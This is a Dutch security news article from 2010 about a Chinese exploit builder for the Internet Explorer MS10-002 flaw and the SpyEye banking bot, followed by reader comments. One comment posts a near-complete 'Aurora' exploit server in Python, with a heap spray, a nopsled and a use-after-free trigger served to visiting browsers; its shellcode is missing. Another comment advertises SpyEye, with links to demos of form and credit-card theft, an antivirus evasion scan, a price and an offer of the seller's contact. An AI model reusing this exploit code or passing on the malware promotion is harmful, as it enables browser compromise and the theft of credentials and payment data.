image

Chinese Internet Explorer exploit-bouwdoos

woensdag 27 januari 2010, 14:49 door Redactie, 8 reacties

Het via een noodpatch gedichte beveiligingslek in Internet Explorer wordt op dit moment actief tegen internetgebruikers ingezet en het verschijnen van een bouwdoos maakt dat alleen maar eenvoudiger. Het Spaanse anti-virusbedrijf Panda Security maakt melding van een "MS10-002 Exploit Constructor", die op Chinese hackersites werd aangetroffen. De toolkit, gemaakt door de “Dark Techniques Working Group”, genereert een html-bestand dat de exploit bevat. Zodra een slachtoffer het bestand opent, wordt er een opgegeven .exe bestand gedownload en uitgevoerd.

De .exe zou bijvoorbeeld een bot kunnen zijn, zoals de nieuwe SpyEye. Deze bot verscheen begin januari en beschikt over een aantal interessante features. De bot wordt voor 350 euro aangeboden en laat gebruikers ingevoerde formulieren, FTP en POP3 inloggegevens en creditcardgegevens stelen. Daarnaast is de bot onzichtbaar in de processenlijst van Windows. De eerste dagen werd de bot door geen enkel anti-virusbedrijf ontdekt. "Zoals we zien wordt deze industrie steeds groter en complexer, iets dat zeer alarmerend is", zegt malware-onderzoeker Mariano Miguel.

Reacties (8)
27-01-2010, 15:04 door Anoniem
en waar kun je deze Exploit Constructur downloaden zodat ik meer te weten kan komen betreft de werking van de Exploit
27-01-2010, 15:24 door Preddie
Door Anoniem: en waar kun je deze Exploit Constructur downloaden zodat ik meer te weten kan komen betreft de werking van de Exploit


Volgens mij wil jij helemaal niet weten hoe die exploit werkt maar die gewoon misbruiken .....

zo niet ... dan heb je aan de onderstaande informatie meer als de n00b constructor pack (waarschijnlijk is dat pack ook gewoon voorzien van een trojan) en sorry voor het onstaande abracadabra voor de mensen die het niet snappen

import sys
import socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class RequestHandler(BaseHTTPRequestHandler):
def convert_to_utf16(self, payload):
enc_payload = ''
for i in range(0, len(payload), 2):
num = 0
for j in range(0, 2):
num += (ord(payload[i + j]) & 0xff) << (j * 8)
enc_payload += '%%u%04x' % num
return enc_payload
def get_payload(self):
payload = REMOVED
return self.convert_to_utf16(payload)
def get_exploit(self):
exploit = '''
<html>
<head>
<script>
var obj, event_obj;
function spray_heap()
{
var chunk_size, payload, nopsled;
chunk_size = 0x80000;
payload = unescape("<PAYLOAD>");
nopsled = unescape("<NOP>");
while (nopsled.length < chunk_size)
nopsled += nopsled;
nopsled_len = chunk_size - (payload.length + 20);
nopsled = nopsled.substring(0, nopsled_len);
heap_chunks = new Array();
for (var i = 0 ; i < 200 ; i++)
heap_chunks = nopsled + payload;
}
function initialize()
{
obj = new Array();
event_obj = null;
for (var i = 0; i < 200 ; i++ )
obj = document.createElement("COMMENT");
}
function ev1(evt)
{
event_obj = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 1);
}

function ev2()
{
var data, tmp;

data = "";
tmp = unescape("%u0a0a%u0a0a");
for (var i = 0 ; i < 4 ; i++)
data += tmp;
for (i = 0 ; i < obj.length ; i++ ) {
obj.data = data;
}
event_obj.srcElement;
}

function check()
{
if (navigator.userAgent.indexOf("MSIE") == -1)
return false;
return true;
}

if (check()) {
initialize();
spray_heap();
}
else
window.location = 'about:blank'

</script>
</head>
<body>
<span id="sp1">
<img src="aurora.gif" onload="ev1(event)">
</span>
</body>
</html>
'''
exploit = exploit.replace('<PAYLOAD>', self.get_payload())
exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a')
return exploit

def get_image(self):
content = REMOVED
return content

def log_request(self, *args, **kwargs):
pass

def do_GET(self):
try:
if self.path == '/':
print
print '[-] Incoming connection from %s' % self.client_address[0]
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
print '[-] Sending exploit to %s ...' % self.client_address[0]
self.wfile.write(self.get_exploit())
print '[-] Exploit sent to %s' % self.client_address[0]
elif self.path == '/aurora.gif':
self.send_response(200)
self.send_header('Content-Type', 'image/gif')
self.end_headers()
self.wfile.write(self.get_image())
except:
print '[*] Error : an error has occured while serving the HTTP request'
print '[-] Exiting ...'
sys.exit(-1)


def main():
if len(sys.argv) != 2:
print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0]
sys.exit(0)
try:
port = int(sys.argv[1])
if port < 1024 or port > 65535:
raise ValueError
try:
serv = HTTPServer(('', port), RequestHandler)
ip = socket.gethostbyname(socket.gethostname())
print '[-] Web server is running at http://%s:%d/' % (ip, port)
try:
serv.serve_forever()
except:
print '[-] Exiting ...'
except socket.error:
print '[*] Error : a socket error has occurred'
sys.exit(-1)
except ValueError:
print '[*] Error : an invalid port number was given'
sys.exit(-1)
if __name__ == '__main__':
main()
[/quote]
27-01-2010, 15:40 door Anoniem
Is deze exploit ook te vinden in BT Predjuh?
27-01-2010, 15:47 door ThePope
Door Predjuh:
Door Anoniem: en waar kun je deze Exploit Constructur downloaden zodat ik meer te weten kan komen betreft de werking van de Exploit


Volgens mij wil jij helemaal niet weten hoe die exploit werkt maar die gewoon misbruiken .....

zo niet ... dan heb je aan de onderstaande informatie meer als de n00b constructor pack (waarschijnlijk is dat pack ook gewoon voorzien van een trojan) en sorry voor het onstaande abracadabra voor de mensen die het niet snappen

import sys
im..........................:
main()


Is dat toevallig ook C++? Of iets wat daar op lijkt?

Ik probeer al een hele tijd wat leuks te vinden waarmee in HTTP request kan versturen. :)
(ben het aan het leren, t.b.v. mijn CMS waar ik ook een lokaal te installeren versie van wil maken. )
27-01-2010, 15:51 door Didier Stevens
Door CenturyChild: Is dat toevallig ook C++? Of iets wat daar op lijkt?

Nee, Python. Maar zal niet werken, de whitespace voor het inspringen is weg, en dat is belangrijk in Python.
27-01-2010, 16:50 door MrBil
Klopt, hij is niet compleet :-)

Wat video's van SpyEye->
Formgrabber: http://www.sendspace.com/file/p921ln
BillingHammer (CC autofill): http://www.sendspace.com/file/y1yond

Hier de laatste scan, 0/26 dus: http://virtest.com/log.php?dir=59312&id=7da3c839f6e3418e18cd5cf99eb5c8c1

En hij kost 500$, 355.31552 Euros

Mooie aankoop, e-mail me voor de maker zijn ICQ
27-01-2010, 23:26 door Preddie
Door MrBil: Klopt, hij is niet compleet :-)

Wat video's van SpyEye->
Formgrabber: http://www.sendspace.com/file/p921ln
BillingHammer (CC autofill): http://www.sendspace.com/file/y1yond

Hier de laatste scan, 0/26 dus: http://virtest.com/log.php?dir=59312&id=7da3c839f6e3418e18cd5cf99eb5c8c1

En hij kost 500$, 355.31552 Euros

Mooie aankoop, e-mail me voor de maker zijn ICQ


hijs is inderdaad niet compleet goed gezien ;)
Ik ga hier ook niet zo maar een code niet planten die mogelijk misbruikt kan worden, met enige verstand van zaken kun je toe de ontbrekende regels toevoegen ;)

maar op deze manier kun je wel het best inzicht krijgen in de werking van de exploit tevens kunnen programmeurs door dit te begrijpen hun applicaties mogelijk ook beschermen tegen fouten die gemaakt kunnen worden tijdens het programmeren van een applicatie als een browser.
01-02-2010, 18:27 door spatieman
hoe zij de CN overheid dat nog eens?
wij hebben geen hackels, hacken is velboden bij de wet.
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.